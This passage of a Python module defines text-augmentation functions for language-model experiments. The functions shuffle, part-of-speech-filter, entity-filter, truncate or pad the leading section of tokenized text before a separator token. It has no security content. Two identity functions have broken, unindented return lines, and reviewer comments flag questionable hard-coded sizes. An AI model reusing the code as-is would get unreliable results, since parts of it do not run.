def shuffle_remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle the first two thirds, then keep only noun-like words there."""
    section_len = 2 * len(tokenized_text) // 3
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
    """Shuffle the first half, then keep only nouns and verbs there."""
    section_len = len(tokenized_text) // 2
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
    """Shuffle the first third, then keep only nouns and verbs there."""
    section_len = len(tokenized_text) // 3
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle the first two thirds, then keep only nouns and verbs there."""
    section_len = 2 * len(tokenized_text) // 3
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list, count):
    """Shuffle the first ``section_length`` tokens, then drop every word there
    whose part-of-speech tag is not in ``pos_list``.

    Returns False when the shuffle step itself fails (falsy result).
    """
    shuffled = shuffle_section(tokenized_text, tokenizer, section_length, count)
    if not shuffled:
        return False
    return remove_all_but_pos(shuffled, tokenizer, section_length, pos_list)
# ---------- REMOVE POS ----------
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half(tokenized_text, tokenizer, count):
    """Keep only content words (N/V/ADJ/ADV) in the first half."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, pos)
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third(tokenized_text, tokenizer, count):
    """Keep only content words (N/V/ADJ/ADV) in the first third."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, pos)
def remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only content words (N/V/ADJ/ADV) in the first two thirds."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV")
    return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, pos)
def remove_all_but_nouns_verbs_and_adjectives_first_half(tokenized_text, tokenizer, count):
    """Keep only nouns, verbs and adjectives in the first half."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, pos)
def remove_all_but_nouns_verbs_and_adjectives_first_third(tokenized_text, tokenizer, count):
    """Keep only nouns, verbs and adjectives in the first third."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, pos)
def remove_all_but_nouns_verbs_and_adjectives_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only nouns, verbs and adjectives in the first two thirds."""
    pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ")
    return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, pos)
def remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
    """Keep only nouns and verbs in the first half."""
    pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, pos)
def remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
    """Keep only nouns and verbs in the first third."""
    pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, pos)
def remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only nouns and verbs in the first two thirds."""
    pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, pos)
def remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
    """Keep only noun-like tokens in the first half."""
    pos = ("NOUN", "PRON", "PROPN")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, pos)
def remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
    """Keep only noun-like tokens in the first third."""
    pos = ("NOUN", "PRON", "PROPN")
    return remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, pos)
def remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only noun-like tokens in the first two thirds."""
    pos = ("NOUN", "PRON", "PROPN")
    return remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, pos)
def remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list):
    """Drop every token in the first section whose spaCy POS tag is not in pos_list.

    The surviving words are joined with spaces, the separator marker is
    appended, and the untouched tail is re-attached before re-tokenizing.
    """
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    kept_words = [token.text for token in nlp(head_text) if token.pos_ in pos_list]
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    augmented = " ".join(kept_words) + "<|endofaugmentedtext|>" + tail_text
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(augmented)), tokenizer, remove_all_but_pos)
# ---------- REMOVE POS AND FILL ----------
def remove_all_but_nouns_and_verbs_fill_first_half(tokenized_text, tokenizer, count):
    """Keep only nouns/verbs in the first 512 tokens, filling out to 1024.

    NOTE(review): section/size here are hard-coded (512/1024) instead of
    being derived from len(tokenized_text) like the non-fill variants —
    confirm these constants match the intended splits.
    """
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos_fill(tokenized_text, tokenizer, 512, noun_verb_pos, 1024)
def remove_all_but_nouns_and_verbs_fill_first_third(tokenized_text, tokenizer, count):
    """Keep only nouns/verbs in the first 1024 tokens, filling out to 1536.

    NOTE(review): "first_third" uses a larger section (1024) than
    "first_half" (512) — verify the constants are intentional.
    """
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos_fill(tokenized_text, tokenizer, 1024, noun_verb_pos, 1536)
def remove_all_but_nouns_and_verbs_fill_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only nouns/verbs in the first 512 tokens, filling out to 1536."""
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return remove_all_but_pos_fill(tokenized_text, tokenizer, 512, noun_verb_pos, 1536)
def remove_all_but_pos_fill(tokenized_text, tokenizer, section_length, pos_list, size):
    """POS-filter the first section (fill variant) and re-tokenize to `size`.

    Same filtering as remove_all_but_pos, but sections come from
    divide_into_sections_fill and the target size is forwarded to
    check_tokenization.
    """
    head_ids, tail_ids = divide_into_sections_fill(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    kept_words = [token.text for token in nlp(head_text) if token.pos_ in pos_list]
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    augmented = " ".join(kept_words) + "<|endofaugmentedtext|>" + tail_text
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(augmented)), tokenizer, remove_all_but_pos_fill, size)
# ---------- SHUFFLE SENTENCES ----------
def shuffle_sentences_first_half(tokenized_text, tokenizer, count):
    """Shuffle sentence order within the first half."""
    return shuffle_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_sentences_first_third(tokenized_text, tokenizer, count):
    """Shuffle sentence order within the first third."""
    return shuffle_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_sentences_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle sentence order within the first two thirds."""
    return shuffle_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_sentences(tokenized_text, tokenizer, section_length, count):
    """Randomly reorder the sentences of the first section (seeded by count)."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    sentences = convert_to_sentences(head_text, tokenizer)
    random.shuffle(sentences)
    rebuilt = "".join(sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)), tokenizer, shuffle_sentences)
# ---------- SHUFFLE WITHIN SENTENCES ----------
def shuffle_within_sentences_first_half(tokenized_text, tokenizer, count):
    """Shuffle words inside each sentence of the first half."""
    return shuffle_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_first_third(tokenized_text, tokenizer, count):
    """Shuffle words inside each sentence of the first third."""
    return shuffle_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle words inside each sentence of the first two thirds."""
    return shuffle_within_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences(tokenized_text, tokenizer, section_length, count):
    """Shuffle the word order inside every sentence of the first section.

    Sentence boundaries themselves are preserved; only the words within
    each sentence are permuted (seeded by count for reproducibility).
    """
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    shuffled_sentences = []
    for sentence in convert_to_sentences(head_text, tokenizer):
        if sentence:  # skip empty sentence strings
            words = convert_to_tokens(sentence, tokenizer)
            random.shuffle(words)
            shuffled_sentences.append("".join(words))
    rebuilt = "".join(shuffled_sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_within_sentences)
# ---------- SHUFFLE WITHIN SENTENCES LOW PMI ----------
def shuffle_within_sentences_low_pmi_first_half(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first half into a low-PMI word order."""
    return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_low_pmi_first_third(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first third into a low-PMI word order."""
    return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_low_pmi_first_two_thirds(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first two thirds into a low-PMI word order."""
    return shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences_low_pmi(tokenized_text, tokenizer, section_length, count):
    """Rewrite each first-section sentence via create_lowpmi (seeded by count)."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    low_pmi_sentences = create_lowpmi(convert_to_sentences(head_text, tokenizer), tokenizer)
    rebuilt = "".join(low_pmi_sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_within_sentences_low_pmi)
# ---------- SHUFFLE WITHIN SENTENCES HIGH PMI ----------
def shuffle_within_sentences_high_pmi_first_half(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first half into a high-PMI word order."""
    return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_sentences_high_pmi_first_third(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first third into a high-PMI word order."""
    return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_sentences_high_pmi_first_two_thirds(tokenized_text, tokenizer, count):
    """Reorder each sentence of the first two thirds into a high-PMI word order."""
    return shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_sentences_high_pmi(tokenized_text, tokenizer, section_length, count):
    """Rewrite each first-section sentence via create_highpmi (seeded by count)."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    # unlike create_lowpmi, create_highpmi also takes the count argument
    high_pmi_sentences = create_highpmi(convert_to_sentences(head_text, tokenizer), tokenizer, count)
    rebuilt = "".join(high_pmi_sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_within_sentences_high_pmi)
# ---------- SHUFFLE WITHIN TRIGRAMS ----------
def shuffle_within_trigrams_first_half(tokenized_text, tokenizer, count):
    """Trigram-shuffle each sentence of the first half."""
    return shuffle_within_trigrams(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_trigrams_first_third(tokenized_text, tokenizer, count):
    """Trigram-shuffle each sentence of the first third."""
    return shuffle_within_trigrams(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_trigrams_first_two_thirds(tokenized_text, tokenizer, count):
    """Trigram-shuffle each sentence of the first two thirds."""
    return shuffle_within_trigrams(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_trigrams(tokenized_text, tokenizer, section_length, count):
    """Apply trigram_shuffle to every sentence of the first section (seeded by count)."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    shuffled_sentences = []
    for sentence in convert_to_sentences(head_text, tokenizer):
        if sentence:  # skip empty sentence strings
            words = convert_to_tokens(sentence, tokenizer)
            shuffled_sentences.append(trigram_shuffle(words))
    rebuilt = "".join(shuffled_sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_within_trigrams)
# ---------- SHUFFLE TRIGRAMS WITHIN SENTENCES ----------
def shuffle_trigrams_within_sentences_first_half(tokenized_text, tokenizer, count):
    """Shuffle trigram order inside each sentence of the first half."""
    return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_trigrams_within_sentences_first_third(tokenized_text, tokenizer, count):
    """Shuffle trigram order inside each sentence of the first third."""
    return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_trigrams_within_sentences_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle trigram order inside each sentence of the first two thirds."""
    return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_trigrams_within_sentences(tokenized_text, tokenizer, section_length, count):
    """Apply shuffle_trigrams to every sentence of the first section (seeded by count)."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    shuffled_sentences = []
    for sentence in convert_to_sentences(head_text, tokenizer):
        if sentence:  # skip empty sentence strings
            words = convert_to_tokens(sentence, tokenizer)
            shuffled_sentences.append(shuffle_trigrams(words))
    rebuilt = "".join(shuffled_sentences + ["<|endofaugmentedtext|>", tail_text])
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_trigrams_within_sentences)
# ---------- SHUFFLE TRIGRAMS GLOBALLY ----------
def shuffle_trigrams_globally_first_half(tokenized_text, tokenizer, count):
    """Shuffle trigram order across the whole first half."""
    return shuffle_trigrams_globally(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_trigrams_globally_first_third(tokenized_text, tokenizer, count):
    """Shuffle trigram order across the whole first third."""
    return shuffle_trigrams_globally(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_trigrams_globally_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle trigram order across the whole first two thirds."""
    return shuffle_trigrams_globally(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_trigrams_globally(tokenized_text, tokenizer, section_length, count):
    """Shuffle trigrams over the entire first section, ignoring sentence bounds."""
    random.seed(42 + count)
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    shuffled_head = shuffle_trigrams(convert_to_tokens(head_text, tokenizer))
    rebuilt = shuffled_head + "<|endofaugmentedtext|>" + tail_text
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(rebuilt)),
                              tokenizer, shuffle_trigrams_globally)
# ---------- SHUFFLE SENTENCES & REMOVE POS ----------
def shuffle_sentences_remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first half, then keep only noun-like tokens."""
    noun_pos = ("NOUN", "PRON", "PROPN")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, noun_pos, count)
def shuffle_sentences_remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first third, then keep only noun-like tokens."""
    noun_pos = ("NOUN", "PRON", "PROPN")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, noun_pos, count)
def shuffle_sentences_remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first two thirds, then keep only noun-like tokens."""
    noun_pos = ("NOUN", "PRON", "PROPN")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, noun_pos, count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first half, then keep only nouns/verbs."""
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, noun_verb_pos, count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first third, then keep only nouns/verbs."""
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, noun_verb_pos, count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle sentences in the first two thirds, then keep only nouns/verbs."""
    noun_verb_pos = ("NOUN", "PRON", "PROPN", "VERB")
    return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, noun_verb_pos, count)
def shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list, count):
    """Shuffle sentence order in the first section, then POS-filter it.

    Returns False when the sentence-shuffle step reports failure.
    """
    shuffled = shuffle_sentences(tokenized_text, tokenizer, section_length, count)
    if not shuffled:
        return False
    return remove_all_but_pos(shuffled, tokenizer, section_length, pos_list)
# ---------- NER ----------
def remove_all_but_named_entities_first_half(tokenized_text, tokenizer, count):
    """Keep only named entities in the first half of the text."""
    return remove_all_but_named_entities(tokenized_text, tokenizer, len(tokenized_text) // 2)
def remove_all_but_named_entities_first_third(tokenized_text, tokenizer, count):
    """Keep only named entities in the first third of the text."""
    return remove_all_but_named_entities(tokenized_text, tokenizer, len(tokenized_text) // 3)
def remove_all_but_named_entities_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only named entities in the first two thirds of the text."""
    return remove_all_but_named_entities(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def remove_all_but_named_entities(tokenized_text, tokenizer, section_length):
    """Replace the first section with just its spaCy named entities.

    The section is decoded to text, run through nlp(), and reduced to a
    space-joined list of entity spans before the separator and the
    untouched tail are re-attached and re-tokenized.
    """
    first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
    first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
    nlp_first_part_text = nlp(first_part_text)
    first_part_text = " ".join(ent.text for ent in nlp_first_part_text.ents)
    second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
    # Bug fix: previously passed remove_all_but_pos here (copy-paste), so
    # check_tokenization mis-attributed failures; pass this function instead,
    # matching the convention used by every other augmentation.
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_named_entities)
# ---------- FUNCTION WORDS ----------
def remove_all_but_function_words_first_half(tokenized_text, tokenizer, count):
    """Keep only function words (non-content POS) in the first half."""
    return remove_all_but_function_words(tokenized_text, tokenizer, len(tokenized_text) // 2)
def remove_all_but_function_words_first_third(tokenized_text, tokenizer, count):
    """Keep only function words (non-content POS) in the first third."""
    return remove_all_but_function_words(tokenized_text, tokenizer, len(tokenized_text) // 3)
def remove_all_but_function_words_first_two_thirds(tokenized_text, tokenizer, count):
    """Keep only function words (non-content POS) in the first two thirds."""
    return remove_all_but_function_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def remove_all_but_function_words(tokenized_text, tokenizer, section_length):
    """Strip the first section down to function words only.

    "Function words" are defined negatively: any token whose spaCy POS tag
    is NOT one of the content-word tags (noun/pronoun/proper-noun/verb/
    adjective/adverb) is kept.
    """
    content_pos = ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV")
    first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
    first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
    nlp_first_part_text = nlp(first_part_text)
    first_part_text = " ".join(token.text for token in nlp_first_part_text if token.pos_ not in content_pos)
    second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
    # Bug fix: previously passed remove_all_but_pos here (copy-paste), so
    # check_tokenization mis-attributed failures; pass this function instead,
    # matching the convention used by every other augmentation.
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_function_words)
# ---------- RARE WORDS ----------
def remove_all_but_rare_words_first_half(tokenized_text, tokenizer, count, rare_words):
    """Keep only words from `rare_words` in the first half."""
    return remove_all_but_rare_words(tokenized_text, tokenizer, len(tokenized_text) // 2, rare_words)
def remove_all_but_rare_words_first_third(tokenized_text, tokenizer, count, rare_words):
    """Keep only words from `rare_words` in the first third."""
    return remove_all_but_rare_words(tokenized_text, tokenizer, len(tokenized_text) // 3, rare_words)
def remove_all_but_rare_words_first_two_thirds(tokenized_text, tokenizer, count, rare_words):
    """Keep only words from `rare_words` in the first two thirds."""
    return remove_all_but_rare_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, rare_words)
def remove_all_but_rare_words(tokenized_text, tokenizer, section_length, rare_words):
    """Drop every first-section word whose lowercased form is not in rare_words."""
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    words = convert_to_tokens(head_text, tokenizer)
    kept = [word.strip() for word in words if word.lower().strip() in rare_words]
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    augmented = " ".join(kept) + "<|endofaugmentedtext|>" + tail_text
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(augmented)), tokenizer, remove_all_but_rare_words)
# ---------- COMMON WORDS ----------
def remove_all_but_common_words_first_half(tokenized_text, tokenizer, count, common_words):
    """Keep only words from `common_words` in the first half."""
    return remove_all_but_common_words(tokenized_text, tokenizer, len(tokenized_text) // 2, common_words)
def remove_all_but_common_words_first_third(tokenized_text, tokenizer, count, common_words):
    """Keep only words from `common_words` in the first third."""
    return remove_all_but_common_words(tokenized_text, tokenizer, len(tokenized_text) // 3, common_words)
def remove_all_but_common_words_first_two_thirds(tokenized_text, tokenizer, count, common_words):
    """Keep only words from `common_words` in the first two thirds."""
    return remove_all_but_common_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, common_words)
def remove_all_but_common_words(tokenized_text, tokenizer, section_length, common_words):
    """Drop every first-section word whose lowercased form is not in common_words."""
    head_ids, tail_ids = divide_into_sections(tokenized_text, tokenizer, section_length)
    head_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(head_ids))
    words = convert_to_tokens(head_text, tokenizer)
    kept = [word.strip() for word in words if word.lower().strip() in common_words]
    tail_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(tail_ids))
    augmented = " ".join(kept) + "<|endofaugmentedtext|>" + tail_text
    return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(augmented)), tokenizer, remove_all_but_common_words)
# ---------- TRUNCATE AND PAD ----------
def truncate_and_pad_first_half(tokenized_text, tokenizer, count):
    """Truncate a random-length prefix of the first half (seeded by count)."""
    return truncate_and_pad(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def truncate_and_pad_first_third(tokenized_text, tokenizer, count):
    """Truncate a random-length prefix of the first third (seeded by count)."""
    return truncate_and_pad(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def truncate_and_pad_first_two_thirds(tokenized_text, tokenizer, count):
    """Truncate a random-length prefix of the first two thirds (seeded by count)."""
    return truncate_and_pad(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def truncate_and_pad(tokenized_text, tokenizer, section_length, count=None):
    """Drop a random-length prefix of the first section, then insert the separator.

    count: optional seed index. When given, the RNG is seeded with
    42 + count so the augmentation is reproducible, matching every other
    augmentation in this module (previously the randint here was unseeded,
    making this the only non-deterministic augmentation). Defaults to None
    to preserve the legacy unseeded behavior for existing callers.
    """
    if count is not None:
        random.seed(42 + count)
    truncate_index = random.randint(0, section_length)
    return check_tokenization(tokenized_text,
                              tokenized_text[truncate_index:section_length]
                              + tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))
                              + tokenized_text[section_length:],
                              tokenizer,
                              truncate_and_pad)
# ---------- PAD ----------
def pad_first_half(tokenized_text, tokenizer, count):
    """Replace the first half entirely with the separator token."""
    return pad(tokenized_text, tokenizer, len(tokenized_text) // 2)
def pad_first_third(tokenized_text, tokenizer, count):
    """Replace the first third entirely with the separator token."""
    return pad(tokenized_text, tokenizer, len(tokenized_text) // 3)
def pad_first_two_thirds(tokenized_text, tokenizer, count):
    """Replace the first two thirds entirely with the separator token."""
    return pad(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def pad(tokenized_text, tokenizer, section_length):
    """Drop the first section entirely, leaving only the separator plus the tail."""
    separator_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))
    return check_tokenization(tokenized_text,
                              separator_ids + tokenized_text[section_length:],
                              tokenizer,
                              pad)
# ---------- IDENTITY ----------
def identity(tokenized_text, tokenizer):
return tokenized_text
def identity_first_third(tokenized_text, tokenizer):
return tokenized_text
def identity_first_two_thirds(tokenized_text, tokenizer):
    """No-op augmentation for the first-two-thirds scope: returns input unchanged."""
    return tokenized_text
# ---------- FUNCTION MAPPINGS ----------
# Lookup table: augmentation-name string -> implementing callable, for the
# "_half" configuration (each callable here operates on the first half of the
# token sequence).
HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
    "identity_half": identity,
    "shuffle_first_half": shuffle_first_half,
    "shuffle_sentences_first_half": shuffle_sentences_first_half,
    "shuffle_within_sentences_first_half": shuffle_within_sentences_first_half,
    "shuffle_within_sentences_low_pmi_first_half": shuffle_within_sentences_low_pmi_first_half,
    "shuffle_within_sentences_high_pmi_first_half": shuffle_within_sentences_high_pmi_first_half,
    "remove_all_but_nouns_first_half": remove_all_but_nouns_first_half,
    "remove_all_but_nouns_and_verbs_first_half": remove_all_but_nouns_and_verbs_first_half,
    "remove_all_but_nouns_verbs_and_adjectives_first_half": remove_all_but_nouns_verbs_and_adjectives_first_half,
    "remove_all_but_named_entities_first_half": remove_all_but_named_entities_first_half,
